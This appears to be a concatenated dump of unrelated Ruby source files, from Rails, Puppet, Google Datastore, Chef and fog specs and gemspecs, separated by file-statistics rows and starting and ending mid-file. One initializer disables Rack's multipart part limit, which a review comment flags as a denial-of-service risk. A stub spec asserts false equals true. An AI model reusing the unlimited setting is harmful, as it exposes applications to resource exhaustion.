app 'Neo4j Desktop.app'
end
| 30.769231 | 80 | 0.74 |
bb8019e4006c09c18371a226c97b9665277a99c7 | 213 | require 'pry'
RSpec.configure do |config|
  # NOTE(review): RSpec-2-era option; it was removed in RSpec 3, where this
  # behaviour became the default - confirm which rspec version is pinned.
  config.treat_symbols_as_metadata_keys_with_true_values = true
  # If a filter such as :focus matches no examples, run the full suite.
  config.run_all_when_everything_filtered = true
  config.filter_run :focus
  # Random order surfaces accidental dependencies between examples.
  config.order = 'random'
end
| 23.666667 | 63 | 0.807512 |
624d69126b58f9f9b777fd9dfa6b4613973dde35 | 118 | class AddUserIdToSong < ActiveRecord::Migration[5.0]
def change
add_column :songs, :user_id, :integer
end
end
| 19.666667 | 52 | 0.737288 |
bbe4c60faa243ea2e95a05effedeeb7402a27e9f | 903 | # frozen_string_literal: true
class ApplicationController < ActionController::Base
  protect_from_forgery with: :exception
  # Order matters: require_login redirects (halting the chain) before
  # active_user? dereferences current_user.
  before_action :require_login, :active_user?
  # The clearance holding page must stay reachable for inactive users.
  skip_before_action :active_user?, only: [:clearance]
  helper_method :logged_in?, :current_user

  # The user for the current session, or nil when not logged in.
  def current_user
    User.find_by(id: session[:user_id])
  end

  def logged_in?
    current_user.present?
  end

  # Holding page shown while an account is not yet activated; active users
  # are sent straight to their passages.
  def clearance
    return redirect_to passages_path if current_user.active
    render 'shared/clearance', layout: false
  end

  # Raises CanCan::AccessDenied (via authorize!) when the current user lacks
  # permission for +action+ on +subject_class+.
  def verify_privileges(action, subject_class)
    authorize! action.to_sym, subject_class
  end

  # Surfaces authorization failures as routing errors (404s) so unauthorized
  # users cannot probe which resources exist.
  rescue_from CanCan::AccessDenied do |exception|
    # Pass the message through directly; the previous "#{exception.message}"
    # interpolation only allocated a needless copy of the string.
    raise ActionController::RoutingError, exception.message
  end

  private

  def active_user?
    redirect_to clearance_url unless current_user.active
  end

  def require_login
    redirect_to login_url unless logged_in?
  end
end
| 21.5 | 64 | 0.76412 |
ab6f456bf2f07b824e8f4b497f89f3a16e1ed50f | 867 | Pod::Spec.new do |s|
s.name = "FMDB"
s.version = "4.0.2"
s.summary = "A Cocoa / Objective-C wrapper around SQLite - Salesforce Mobile SDK fork"
s.homepage = "https://github.com/ccgus/fmdb"
s.license = "MIT"
s.author = { "August Mueller" => "[email protected]" }
s.platform = :ios, "8.0"
s.source = { :git => "https://github.com/forcedotcom/SalesforceMobileSDK-iOS.git",
:tag => "pod_v#{s.version}",
:submodules => true }
s.requires_arc = true
s.default_subspec = 'FMDB'
s.subspec 'FMDB' do |fmdb|
fmdb.source_files = 'external/fmdb/src/fmdb/FM*.{h,m}'
fmdb.exclude_files = 'external/fmdb/src/fmdb.m'
fmdb.xcconfig = { 'OTHER_CFLAGS' => '$(inherited) -DSQLITE_HAS_CODEC' }
fmdb.dependency 'SQLCipher/fts', '~> 3.3.1'
end
end
| 29.896552 | 93 | 0.574394 |
62ec8435819fb294411135e04a75375cbad9ff45 | 220 | # Change multipart limit from 128 (default) to unlimited
# http://stackoverflow.com/questions/27773368/rails-4-2-internal-server-error-with-maximum-file-multiparts-in-content-reached
# NOTE(review): 0 disables the cap entirely, so a single crafted request can
# carry an unbounded number of multipart parts (memory/DoS risk). Consider a
# finite limit sized for the largest legitimate upload instead.
Rack::Utils.multipart_part_limit = 0
| 55 | 125 | 0.813636 |
268b435cf02a46f22176bd7afed8b2829df43a27 | 10,110 | require 'puppet/util/logging'
require 'semver'
require 'json'
# Support for modules
class Puppet::Module
  # Error hierarchy for module handling; all inherit from Puppet::Error so
  # callers can rescue the whole family via Puppet::Module::Error.
  class Error < Puppet::Error; end
  class MissingModule < Error; end
  class IncompatibleModule < Error; end
  class UnsupportedPlatform < Error; end
  class IncompatiblePlatform < Error; end
  class MissingMetadata < Error; end
  class InvalidName < Error; end
  class InvalidFilePattern < Error; end
  include Puppet::Util::Logging
  # Maps a public file-type name (used to generate accessor methods below)
  # to the on-disk subdirectory inside a module that holds those files.
  FILETYPES = {
    "manifests" => "manifests",
    "files" => "files",
    "templates" => "templates",
    "plugins" => "lib",
    "pluginfacts" => "facts.d",
  }
  # Find and return the +module+ that +path+ belongs to. If +path+ is
  # absolute, or if there is no module whose name is the first component
  # of +path+, return +nil+
  def self.find(modname, environment = nil)
    return nil unless modname
    # Unless a specific environment is given, use the current environment
    env = environment ? Puppet.lookup(:environments).get!(environment) : Puppet.lookup(:current_environment)
    env.module(modname)
  end
  # True when +path+/+name+ exists, is a directory, and +name+ is a valid
  # module directory name.
  def self.is_module_directory?(name, path)
    # it must be a directory
    fullpath = File.join(path, name)
    return false unless Puppet::FileSystem.directory?(fullpath)
    return is_module_directory_name?(name)
  end
  def self.is_module_directory_name?(name)
    # it must match an installed module name according to forge validator
    return true if name =~ /^[a-z][a-z0-9_]*$/
    return false
  end
  def self.is_module_namespaced_name?(name)
    # it must match the full module name according to forge validator
    return true if name =~ /^[a-zA-Z0-9]+[-][a-z][a-z0-9_]*$/
    return false
  end
  attr_reader :name, :environment, :path, :metadata
  attr_writer :environment
  attr_accessor :dependencies, :forge_name
  # These attributes are populated from metadata.json by #load_metadata
  # (see the send(attr + "=", value) loop there).
  attr_accessor :source, :author, :version, :license, :summary, :description, :project_page
  # @param name [String] the module name (validated by #assert_validity)
  # @param path [String] filesystem path to the module root
  # @param environment [Puppet::Node::Environment] owning environment
  # @raise [InvalidName] when the name fails validation
  def initialize(name, path, environment)
    @name = name
    @path = path
    @environment = environment
    assert_validity
    load_metadata if has_metadata?
    @absolute_path_to_manifests = Puppet::FileSystem::PathPattern.absolute(manifests)
  end
  # @deprecated The puppetversion module metadata field is no longer used.
  def puppetversion
    nil
  end
  # @deprecated The puppetversion module metadata field is no longer used.
  def puppetversion=(something)
  end
  # @deprecated The puppetversion module metadata field is no longer used.
  def validate_puppet_version
    return
  end
  # True when metadata.json exists, parses as JSON, and contains a non-empty
  # Hash. Parse failures are logged at debug level and treated as "no
  # metadata" rather than raised.
  def has_metadata?
    return false unless metadata_file
    return false unless Puppet::FileSystem.exist?(metadata_file)
    begin
      metadata = JSON.parse(File.read(metadata_file))
    rescue JSON::JSONError => e
      Puppet.debug("#{name} has an invalid and unparsable metadata.json file. The parse error: #{e.message}")
      return false
    end
    return metadata.is_a?(Hash) && !metadata.keys.empty?
  end
  # For each file type this defines three methods, e.g. for "manifests":
  #   manifests?       -> boolean, does the subdirectory exist
  #   manifest(file)   -> full path of +file+ (or the base dir when nil)
  #   manifests        -> the base directory for that type
  FILETYPES.each do |type, location|
    # A boolean method to let external callers determine if
    # we have files of a given type.
    define_method(type +'?') do
      type_subpath = subpath(location)
      unless Puppet::FileSystem.exist?(type_subpath)
        Puppet.debug("No #{type} found in subpath '#{type_subpath}' " +
            "(file / directory does not exist)")
        return false
      end
      return true
    end
    # A method for returning a given file of a given type.
    # e.g., file = mod.manifest("my/manifest.pp")
    #
    # If the file name is nil, then the base directory for the
    # file type is passed; this is used for fileserving.
    define_method(type.sub(/s$/, '')) do |file|
      # If 'file' is nil then they're asking for the base path.
      # This is used for things like fileserving.
      if file
        full_path = File.join(subpath(location), file)
      else
        full_path = subpath(location)
      end
      return nil unless Puppet::FileSystem.exist?(full_path)
      return full_path
    end
    # Return the base directory for the given type
    define_method(type) do
      subpath(location)
    end
  end
  # Memoized path to the module's "License" file, or nil when the module has
  # no path. Note: existence of the file is not checked here.
  def license_file
    return @license_file if defined?(@license_file)
    return @license_file = nil unless path
    @license_file = File.join(path, "License")
  end
  # Parses metadata.json and populates @metadata, @forge_name, and the
  # attr_accessors declared above. Dependency names are normalized from
  # "author-module" to "author/module" and given a default version
  # requirement of ">= 0.0.0".
  # @raise [MissingMetadata] when a required key is absent or dependencies
  #   is not an array
  def load_metadata
    @metadata = data = JSON.parse(File.read(metadata_file))
    @forge_name = data['name'].gsub('-', '/') if data['name']
    [:source, :author, :version, :license, :dependencies].each do |attr|
      unless value = data[attr.to_s]
        raise MissingMetadata, "No #{attr} module metadata provided for #{self.name}"
      end
      if attr == :dependencies
        unless value.is_a?(Array)
          raise MissingMetadata, "The value for the key dependencies in the file metadata.json of the module #{self.name} must be an array, not: '#{value}'"
        end
        value.each do |dep|
          name = dep['name']
          dep['name'] = name.tr('-', '/') unless name.nil?
          dep['version_requirement'] ||= '>= 0.0.0'
        end
      end
      send(attr.to_s + "=", value)
    end
  end
  # Return the list of manifests matching the given glob pattern,
  # defaulting to 'init.pp' for empty modules.
  def match_manifests(rest)
    if rest
      wanted_manifests = wanted_manifests_from(rest)
      searched_manifests = wanted_manifests.glob.reject { |f| FileTest.directory?(f) }
    else
      searched_manifests = []
    end
    # (#4220) Always ensure init.pp in case class is defined there.
    init_manifest = manifest("init.pp")
    if !init_manifest.nil? && !searched_manifests.include?(init_manifest)
      searched_manifests.unshift(init_manifest)
    end
    searched_manifests
  end
  # Every .pp file under the manifests directory (recursive), or [] when the
  # directory does not exist.
  def all_manifests
    return [] unless Puppet::FileSystem.exist?(manifests)
    Dir.glob(File.join(manifests, '**', '*.pp'))
  end
  # Memoized path to metadata.json, or nil when the module has no path.
  def metadata_file
    return @metadata_file if defined?(@metadata_file)
    return @metadata_file = nil unless path
    @metadata_file = File.join(path, "metadata.json")
  end
  # The directory containing this module (i.e. the modulepath entry it lives in).
  def modulepath
    File.dirname(path) if path
  end
  # Find all plugin directories. This is used by the Plugins fileserving mount.
  def plugin_directory
    subpath("lib")
  end
  # Directory for external facts shipped with the module.
  def plugin_fact_directory
    subpath("facts.d")
  end
  def has_external_facts?
    File.directory?(plugin_fact_directory)
  end
  # Records a (name, version) pair in @supports. NOTE(review): @supports is
  # only ever appended to here; nothing in this class reads it back.
  def supports(name, version = nil)
    @supports ||= []
    @supports << [name, version]
  end
  def to_s
    result = "Module #{name}"
    result += "(#{path})" if path
    result
  end
  # Resolves each declared dependency to an installed module in this
  # environment; dependencies that are not installed are silently skipped.
  def dependencies_as_modules
    dependent_modules = []
    dependencies and dependencies.each do |dep|
      author, dep_name = dep["name"].split('/')
      found_module = environment.module(dep_name)
      dependent_modules << found_module if found_module
    end
    dependent_modules
  end
  # Modules in this environment that declare a dependency on this module,
  # keyed by this module's forge name.
  def required_by
    environment.module_requirements[self.forge_name] || {}
  end
  # Identify and mark unmet dependencies. A dependency will be marked unmet
  # for the following reasons:
  #
  # * not installed and is thus considered missing
  # * installed and does not meet the version requirements for this module
  # * installed and doesn't use semantic versioning
  #
  # Returns a list of hashes representing the details of an unmet dependency.
  #
  # Example:
  #
  #   [
  #     {
  #       :reason => :missing,
  #       :name   => 'puppetlabs-mysql',
  #       :version_constraint => 'v0.0.1',
  #       :mod_details => {
  #         :installed_version => '0.0.1'
  #       }
  #       :parent => {
  #         :name    => 'puppetlabs-bacula',
  #         :version => 'v1.0.0'
  #       }
  #     }
  #   ]
  #
  def unmet_dependencies
    unmet_dependencies = []
    return unmet_dependencies unless dependencies
    dependencies.each do |dependency|
      name = dependency['name']
      version_string = dependency['version_requirement'] || '>= 0.0.0'
      # Lookup failures (of any kind) are treated as "dependency not installed".
      dep_mod = begin
        environment.module_by_forge_name(name)
      rescue
        nil
      end
      error_details = {
        :name => name,
        :version_constraint => version_string.gsub(/^(?=\d)/, "v"),
        :parent => {
          :name => self.forge_name,
          :version => self.version.gsub(/^(?=\d)/, "v")
        },
        :mod_details => {
          :installed_version => dep_mod.nil? ? nil : dep_mod.version
        }
      }
      unless dep_mod
        error_details[:reason] = :missing
        unmet_dependencies << error_details
        next
      end
      if version_string
        begin
          required_version_semver_range = SemVer[version_string]
          actual_version_semver = SemVer.new(dep_mod.version)
        rescue ArgumentError
          # Either the constraint or the installed version is not semver.
          error_details[:reason] = :non_semantic_version
          unmet_dependencies << error_details
          next
        end
        unless required_version_semver_range.include? actual_version_semver
          error_details[:reason] = :version_mismatch
          unmet_dependencies << error_details
          next
        end
      end
    end
    unmet_dependencies
  end
  # Structural equality: same name, version, path and environment.
  def ==(other)
    self.name == other.name &&
      self.version == other.version &&
      self.path == other.path &&
      self.environment == other.environment
  end
  private
  # Converts a caller-supplied manifest pattern into an absolute PathPattern
  # rooted at this module's manifests directory, appending ".pp" when the
  # pattern has no extension.
  # @raise [InvalidFilePattern] when the pattern is malformed or would
  #   escape the manifests directory
  def wanted_manifests_from(pattern)
    begin
      extended = File.extname(pattern).empty? ? "#{pattern}.pp" : pattern
      relative_pattern = Puppet::FileSystem::PathPattern.relative(extended)
    rescue Puppet::FileSystem::PathPattern::InvalidPattern => error
      raise Puppet::Module::InvalidFilePattern.new(
        "The pattern \"#{pattern}\" to find manifests in the module \"#{name}\" " +
        "is invalid and potentially unsafe.", error)
    end
    relative_pattern.prefix_with(@absolute_path_to_manifests)
  end
  # Joins a FILETYPES location onto the module root.
  def subpath(type)
    File.join(path, type)
  end
  # @raise [InvalidName] unless the name is a plain or namespaced module name
  def assert_validity
    if !Puppet::Module.is_module_directory_name?(@name) && !Puppet::Module.is_module_namespaced_name?(@name)
      raise InvalidName, "Invalid module name #{@name}; module names must be alphanumeric (plus '-'), not '#{@name}'"
    end
  end
end
| 28.398876 | 156 | 0.654303 |
ababb38bc79ba7c755892fe590c472238a249ec4 | 1,895 | require 'spec_helper'
require 'mspec/expectations/expectations'
require 'mspec/matchers'
# Shared examples for HaveInstanceVariableMatcher behaviour that is the same
# on every Ruby version. The including context must set up:
#   @object       - an object whose instance_variables include @foo
#   @ruby_version - the real RUBY_VERSION constant, restored in after(:all)
shared_examples_for "have_instance_variable, on all Ruby versions" do
  after :all do
    # Restore the RUBY_VERSION constant stubbed by the including context.
    Object.const_set :RUBY_VERSION, @ruby_version
  end
  it "matches when object has the instance variable, given as string" do
    matcher = HaveInstanceVariableMatcher.new('@foo')
    matcher.matches?(@object).should be_true
  end
  it "matches when object has the instance variable, given as symbol" do
    matcher = HaveInstanceVariableMatcher.new(:@foo)
    matcher.matches?(@object).should be_true
  end
  it "does not match when object hasn't got the instance variable, given as string" do
    matcher = HaveInstanceVariableMatcher.new('@bar')
    matcher.matches?(@object).should be_false
  end
  it "does not match when object hasn't got the instance variable, given as symbol" do
    matcher = HaveInstanceVariableMatcher.new(:@bar)
    matcher.matches?(@object).should be_false
  end
  it "provides a failure message for #should" do
    matcher = HaveInstanceVariableMatcher.new(:@bar)
    matcher.matches?(@object)
    matcher.failure_message.should == [
      "Expected #{@object.inspect} to have instance variable '@bar'",
      "but it does not"
    ]
  end
  # Fixed typo in the example description: "messoge" -> "message".
  it "provides a failure message for #should_not" do
    matcher = HaveInstanceVariableMatcher.new(:@bar)
    matcher.matches?(@object)
    matcher.negative_failure_message.should == [
      "Expected #{@object.inspect} NOT to have instance variable '@bar'",
      "but it does"
    ]
  end
end
describe HaveInstanceVariableMatcher, "on RUBY_VERSION >= 1.9" do
  before :all do
    # Stash the real RUBY_VERSION and stub it so the matcher sees a
    # 1.9-series Ruby; the shared examples restore it in after(:all).
    @ruby_version = Object.const_get :RUBY_VERSION
    Object.const_set :RUBY_VERSION, '1.9.0'
    @object = Object.new
    # On 1.9+ Object#instance_variables returns Symbols, so the stub does too.
    def @object.instance_variables
      [:@foo]
    end
  end
  it_should_behave_like "have_instance_variable, on all Ruby versions"
end
6a71a75350d415e6edabc130ca4a7fa073566f51 | 7,656 | # Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "google/cloud/datastore/dataset/lookup_results"
require "google/cloud/datastore/dataset/query_results"
module Google
  module Cloud
    module Datastore
      ##
      # # ReadOnlyTransaction
      #
      # Represents a read-only Datastore transaction that only allows reads.
      #
      # A read-only transaction cannot modify entities; in return they do not
      # contend with other read-write or read-only transactions. Using a
      # read-only transaction for transactions that only read data will
      # potentially improve throughput.
      #
      # See {Google::Cloud::Datastore::Dataset#transaction}
      #
      # @see https://cloud.google.com/datastore/docs/concepts/transactions
      #   Transactions
      #
      # @example
      #   require "google/cloud/datastore"
      #
      #   datastore = Google::Cloud::Datastore.new
      #
      #   task_list_key = datastore.key "TaskList", "default"
      #   query = datastore.query("Task").
      #     ancestor(task_list_key)
      #
      #   tasks = nil
      #
      #   datastore.read_only_transaction do |tx|
      #     task_list = tx.find task_list_key
      #     if task_list
      #       tasks = tx.run query
      #     end
      #   end
      #
      class ReadOnlyTransaction
        # The transaction id assigned by the service in #start; nil until
        # started and after #reset!.
        attr_reader :id
        ##
        # @private The Service object.
        attr_accessor :service
        ##
        # @private Creates a new ReadOnlyTransaction instance.
        # Takes a Service instead of project and Credentials.
        #
        def initialize service
          @service = service
          reset!
          start
        end
        ##
        # Retrieve an entity by providing key information. The lookup is run
        # within the transaction.
        #
        # @param [Key, String] key_or_kind A Key object or `kind` string value.
        # @param [Integer, String, nil] id_or_name The Key's `id` or `name`
        #   value. Only used when `key_or_kind` is a `kind` string. Optional.
        #
        # @return [Google::Cloud::Datastore::Entity, nil]
        #
        # @example
        #   require "google/cloud/datastore"
        #
        #   datastore = Google::Cloud::Datastore.new
        #
        #   task_list_key = datastore.key "TaskList", "default"
        #
        #   datastore.read_only_transaction do |tx|
        #     task_list = tx.find task_list_key
        #   end
        #
        def find key_or_kind, id_or_name = nil
          key = key_or_kind
          unless key.is_a? Google::Cloud::Datastore::Key
            key = Key.new key_or_kind, id_or_name
          end
          find_all(key).first
        end
        alias get find
        ##
        # Retrieve the entities for the provided keys. The lookup is run within
        # the transaction.
        #
        # @param [Key] keys One or more Key objects to find records for.
        #
        # @return [Google::Cloud::Datastore::Dataset::LookupResults]
        #
        # @example
        #   require "google/cloud/datastore"
        #
        #   datastore = Google::Cloud::Datastore.new
        #
        #   task_key1 = datastore.key "Task", 123456
        #   task_key2 = datastore.key "Task", 987654
        #
        #   datastore.read_only_transaction do |tx|
        #     tasks = tx.find_all task_key1, task_key2
        #   end
        #
        def find_all *keys
          ensure_service!
          lookup_res = service.lookup(*Array(keys).flatten.map(&:to_grpc),
                                      transaction: @id)
          Dataset::LookupResults.from_grpc lookup_res, service, nil, @id
        end
        alias lookup find_all
        ##
        # Retrieve entities specified by a Query. The query is run within the
        # transaction.
        #
        # @param [Query] query The Query object with the search criteria.
        # @param [String] namespace The namespace the query is to run within.
        #
        # @return [Google::Cloud::Datastore::Dataset::QueryResults]
        #
        # @raise [ArgumentError] If `query` is not a Query or GqlQuery.
        #
        # @example
        #   require "google/cloud/datastore"
        #
        #   datastore = Google::Cloud::Datastore.new
        #
        #   query = datastore.query("Task").
        #     where("done", "=", false)
        #   datastore.read_only_transaction do |tx|
        #     tasks = tx.run query
        #   end
        #
        def run query, namespace: nil
          ensure_service!
          unless query.is_a?(Query) || query.is_a?(GqlQuery)
            raise ArgumentError, "Cannot run a #{query.class} object."
          end
          query_res = service.run_query query.to_grpc, namespace,
                                        transaction: @id
          Dataset::QueryResults.from_grpc query_res, service, namespace,
                                          query.to_grpc.dup
        end
        alias run_query run
        ##
        # Begins a transaction.
        # This method is run when a new ReadOnlyTransaction is created.
        #
        # @raise [TransactionError] If the transaction was already started.
        #
        def start
          raise TransactionError, "Transaction already opened." unless @id.nil?
          ensure_service!
          tx_res = service.begin_transaction read_only: true
          @id = tx_res.transaction
        end
        alias begin_transaction start
        ##
        # Commits the transaction.
        #
        # @example
        #   require "google/cloud/datastore"
        #
        #   datastore = Google::Cloud::Datastore.new
        #
        #   task_list_key = datastore.key "TaskList", "default"
        #   query = datastore.query("Task").
        #     ancestor(task_list_key)
        #
        #   tx = datastore.transaction
        #   task_list = tx.find task_list_key
        #   if task_list
        #     tasks = tx.run query
        #   end
        #   tx.commit
        #
        def commit
          if @id.nil?
            raise TransactionError, "Cannot commit when not in a transaction."
          end
          ensure_service!
          # A read-only transaction has no mutations, so commit an empty set.
          service.commit [], transaction: @id
          true
        end
        ##
        # Rolls back the transaction.
        #
        # @example
        #   require "google/cloud/datastore"
        #
        #   datastore = Google::Cloud::Datastore.new
        #
        #   task_list_key = datastore.key "TaskList", "default"
        #   query = datastore.query("Task").
        #     ancestor(task_list_key)
        #
        #   tx = datastore.transaction
        #   task_list = tx.find task_list_key
        #   if task_list
        #     tasks = tx.run query
        #   end
        #   tx.rollback
        #
        def rollback
          if @id.nil?
            raise TransactionError, "Cannot rollback when not in a transaction."
          end
          ensure_service!
          service.rollback @id
          true
        end
        ##
        # Reset the transaction.
        # {ReadOnlyTransaction#start} must be called afterwards.
        def reset!
          @id = nil
        end
        protected
        ##
        # @private Raise an error unless an active connection to the service is
        # available.
        def ensure_service!
          raise "Must have active connection to service" unless service
        end
      end
    end
  end
end
0113930862fa33800225f0d8aa59f5e0a065c1ca | 317 | require 'spec_helper'
RSpec.describe Phantomblaster::Configuration do
subject { described_class.new }
it { expect(subject).to respond_to(:api_key) }
it { expect(subject).to respond_to(:api_key=) }
it { expect(subject).to respond_to(:scripts_dir) }
it { expect(subject).to respond_to(:scripts_dir=) }
end
| 26.416667 | 53 | 0.731861 |
1ac764c200dbfc8d5ac73f3852ddfbb413d40fc5 | 579 | require 'tmpdir'
require 'equivalent-xml/rspec_matchers'
require 'byebug'
require 'simplecov'
require 'coveralls'
SimpleCov.formatter = Coveralls::SimpleCov::Formatter
SimpleCov.start do
track_files "bin/**/*"
track_files "devel/**/*.rb"
add_filter "spec/**/*.rb"
end
puts "running in #{ENV['ROBOT_ENVIRONMENT']} mode"
bootfile = File.expand_path(File.dirname(__FILE__) + '/../config/boot')
require bootfile
tmp_output_dir = File.join(PRE_ASSEMBLY_ROOT, 'tmp')
FileUtils.mkdir_p tmp_output_dir
def noko_doc(x)
Nokogiri.XML(x) { |conf| conf.default_xml.noblanks }
end
| 24.125 | 71 | 0.749568 |
ed208ecdaaeaa39aab0fcf8caca1ffb2d6746021 | 1,748 | # ------------------------------------------------------------
# MicroApp: Ruby GEM
# ------------------------------------------------------------
KDsl.microapp :r03_props do
settings do
name parent.key
app_type :react
title 'R03 Props'
description 'R03 Props '
application 'r03-props'
git_repo_name 'r03-props'
git_organization 'klueless-react-samples'
avatar 'UX Designer'
main_story 'As a Front End Developer, I quickly understand components, state and functions, so that I can build complex react applications'
author 'David Cruwys'
author_email '[email protected]'
copyright_date '2021'
website 'http://appydave.com/react/samples/r03-props'
application_lib_path 'r03-props'
namespace_root 'r03-props'
template_rel_path 'react'
app_path '~/dev/react/r03-props'
data_path '_/.data'
end
is_run = 1
def on_action
s = d.settings
# github_del_repo s.git_repo_name, organization: 'klueless-react-samples'
github_new_repo s.git_repo_name, organization: 'klueless-react-samples'
run_command "npx create-react-app ."
run_command 'code .' # run_command will ensure the folder exists
new_blueprint :bootstrap , definition_subfolder: 'react', output_filename: 'bootstrap.rb', f: false, show_editor: true
end if is_run == 1
L.warn 'set is_run to true if you want to run the action' if is_run == 0
end
| 40.651163 | 162 | 0.528032 |
1ca765d136f868f7f953666617027d82bbc5a4ce | 2,093 | #
# Author:: Adam Jacob (<[email protected]>)
# Copyright:: Copyright (c) 2008-2016 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "spec_helper"
describe Ohai::System, "plugin kernel" do
  before do
    @plugin = get_plugin("kernel")
    allow(@plugin).to receive(:collect_os).and_return(:default) # for debugging
    # Stub every uname invocation the plugin may shell out to, so the spec is
    # independent of the host OS.
    allow(@plugin).to receive(:shell_out).with("uname -s").and_return(mock_shell_out(0, "Darwin\n", ""))
    allow(@plugin).to receive(:shell_out).with("uname -r").and_return(mock_shell_out(0, "9.5.0\n", ""))
    allow(@plugin).to receive(:shell_out).with("uname -v").and_return(mock_shell_out(0, "Darwin Kernel Version 9.5.0: Wed Sep 3 11:29:43 PDT 2008; root:xnu-1228.7.58~1\/RELEASE_I386\n", ""))
    allow(@plugin).to receive(:shell_out).with("uname -m").and_return(mock_shell_out(0, "i386\n", ""))
    allow(@plugin).to receive(:shell_out).with("uname -o").and_return(mock_shell_out(0, "Linux\n", ""))
    allow(@plugin).to receive(:shell_out).with("uname -p").and_return(mock_shell_out(0, "i386\n", ""))
  end
  # Each check asserts that the named kernel attribute is populated from the
  # corresponding uname flag's (stubbed) output.
  it_should_check_from_mash("kernel", "name", "uname -s", [0, "Darwin\n", ""])
  it_should_check_from_mash("kernel", "release", "uname -r", [0, "9.5.0\n", ""])
  it_should_check_from_mash("kernel", "version", "uname -v", [0, "Darwin Kernel Version 9.5.0: Wed Sep 3 11:29:43 PDT 2008; root:xnu-1228.7.58~1\/RELEASE_I386\n", ""])
  it_should_check_from_mash("kernel", "machine", "uname -m", [0, "i386\n", ""])
  it_should_check_from_mash("kernel", "processor", "uname -p", [0, "i386\n", ""])
end
6a1ab72cf16c105549364533cb5d8cf07facad00 | 188 | require 'spec_helper'
describe Jsg do
it 'has a version number' do
expect(Jsg::VERSION).not_to be nil
end
it 'does something useful' do
expect(false).to eq(true)
end
end
| 15.666667 | 38 | 0.691489 |
3871214d7a4f1ae946ae590268717e6f9cb54863 | 716 | # frozen_string_literal: true
module Docs
module V1
module Tasks
extend Dox::DSL::Syntax
document :api do
resource 'Tasks' do
endpoint '/projects/:id/tasks'
group 'Tasks'
end
end
document :index do
action 'Get tasks'
end
document :create do
action 'Create task'
end
document :show do
action 'Read task'
end
document :update do
action 'Update task'
end
document :delete do
action 'Delete task'
end
document :complete do
action 'Complete task'
end
document :position do
action 'Up task'
end
end
end
end
| 15.911111 | 40 | 0.541899 |
1ac0e5ddbe0862ed31f95c2f3d874c402039baea | 145 | require 'peperusha/version'
require 'peperusha/authenticate'
module Peperusha
class Error < StandardError; end
# Your code goes here...
end
| 18.125 | 34 | 0.765517 |
1d5507ac7565103955ec249d11590260990e2c56 | 281 | # frozen_string_literal: true
# add the build->push process onto the end of the deploy:published stack
# after 'deploy:published', 'docker:capdeploy_hook'
# push the no_release auto-cull to the very front of the task stack
# before 'deploy:starting', 'docker:trim_release_roles'
| 35.125 | 72 | 0.779359 |
bf97b12e8bca6a1add87fc0937858595b035572f | 349 | # frozen_string_literal: true
namespace :action_text_lite do
desc "Copy over the migration"
task install: %w( copy_migrations )
task :copy_migrations do
Rake::Task["railties:install:migrations"].reenable # Otherwise you can't run 2 migration copy tasks in one invocation
Rake::Task["action_text:install:migrations"].invoke
end
end
| 29.083333 | 121 | 0.762178 |
3926c4fe5a7242d0071cac3e454f396ee52fc2cf | 2,823 | require 'test_helper'
describe "Fog::Network[:openstack] | lb_vip requests" do
describe "success" do
before do
@lb_vip_format = {
'id' => String,
'subnet_id' => String,
'pool_id' => String,
'protocol' => String,
'protocol_port' => Integer,
'name' => String,
'description' => String,
'address' => String,
'port_id' => String,
'session_persistence' => Hash,
'connection_limit' => Integer,
'status' => String,
'admin_state_up' => Fog::Boolean,
'tenant_id' => String
}
subnet_id = "subnet_id"
pool_id = "pool_id"
protocol = 'HTTP'
protocol_port = 80
attributes = {
:name => 'test-vip',
:description => 'Test VIP',
:address => '10.0.0.1',
:connection_limit => 10,
:session_persistence => {"cookie_name" => "COOKIE_NAME", "type" => "APP_COOKIE"},
:admin_state_up => true,
:tenant_id => 'tenant_id'
}
@lb_vip = network.create_lb_vip(subnet_id, pool_id, protocol, protocol_port, attributes).body
@lb_vip_id = @lb_vip["vip"]["id"]
end
it "#create_lb_vip" do
@lb_vip.must_match_schema('vip' => @lb_vip_format)
end
it "#list_lb_vips" do
network.list_lb_vips.body.must_match_schema('vips' => [@lb_vip_format])
end
it "#get_lb_vip" do
lb_vip_id = network.lb_vips.all.first.id
network.get_lb_vip(lb_vip_id).body.
must_match_schema('vip' => @lb_vip_format)
end
it "#update_lb_vip" do
lb_vip_id = network.lb_vips.all.first.id
attributes = {
:pool_id => "new_pool_id",
:name => "new-test-vip",
:description => "New Test VIP",
:connection_limit => 5,
:session_persistence => {"type" => "HTTP_COOKIE"},
:admin_state_up => false
}
network.update_lb_vip(lb_vip_id, attributes).body.
must_match_schema('vip' => @lb_vip_format)
end
it "#delete_lb_vip" do
lb_vip_id = network.lb_vips.all.first.id
network.delete_lb_vip(lb_vip_id).status.must_equal 204
end
end
describe "failure" do
it "#get_lb_vip" do
proc do
network.get_lb_vip(0)
end.must_raise Fog::Network::OpenStack::NotFound
end
it "#update_lb_vip" do
proc do
network.update_lb_vip(0, {})
end.must_raise Fog::Network::OpenStack::NotFound
end
it "#delete_lb_vip" do
proc do
network.delete_lb_vip(0)
end.must_raise Fog::Network::OpenStack::NotFound
end
end
end
| 30.354839 | 100 | 0.541977 |
21fee78bf8f9fd32d3e0e124dad26aa23c27b838 | 876 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'mercadolibre/version'
Gem::Specification.new do |spec|
spec.name = "mercadolibre"
spec.version = Mercadolibre::VERSION
spec.authors = ["Matias Hick"]
spec.email = ["[email protected]"]
spec.summary = "Connect to Mercadolibre through Meli API"
spec.description = "Connect to Mercadolibre through Meli API"
spec.homepage = "https://github.com/unformattmh/mercadolibre"
spec.license = "MIT"
spec.files = Dir["LICENSE.md", "README.md", "CHANGELOG.md", "lib/**/*"]
spec.executables = []
spec.require_paths = ["lib"]
